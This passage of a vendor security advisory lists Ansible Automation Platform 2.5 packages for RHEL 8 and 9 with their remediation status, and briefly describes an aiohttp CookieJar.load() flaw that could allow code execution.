| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in AIOHTTP, an asynchronous HTTP client/server framework for asyncio and Python. An attacker could exploit this vulnerability by providing untrusted input to the `CookieJar.load()` function. This could potentially lead to arbitrary code execution, allowing the attacker to run malicious code on the affected system. This issue is most likely to occur in applications that allow attacker-controlled files to be loaded.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — |
